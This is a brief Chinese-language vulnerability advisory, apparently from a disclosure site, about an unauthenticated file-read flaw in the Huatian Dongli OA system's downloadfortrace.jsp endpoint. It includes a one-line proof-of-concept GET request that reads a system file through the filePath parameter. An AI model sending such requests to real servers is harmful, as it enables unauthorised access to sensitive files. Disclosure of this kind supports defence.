华天动力 OA /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp 文件读取漏洞

日期: 2025-07-10 | 影响软件: 华天动力OA | POC: 已公开

漏洞描述

华天动力协同OA系统是一款广泛应用于企业和组织的协同办公软件,提供高效的办公自动化解决方案。系统的 /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp 接口存在文件读取漏洞,未经身份验证的攻击者可利用该漏洞读取系统中的敏感文件,导致信息泄露和安全风险。

PoC代码

GET /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp?filePath=c:/windows/win.ini HTTP/1.1

相关漏洞推荐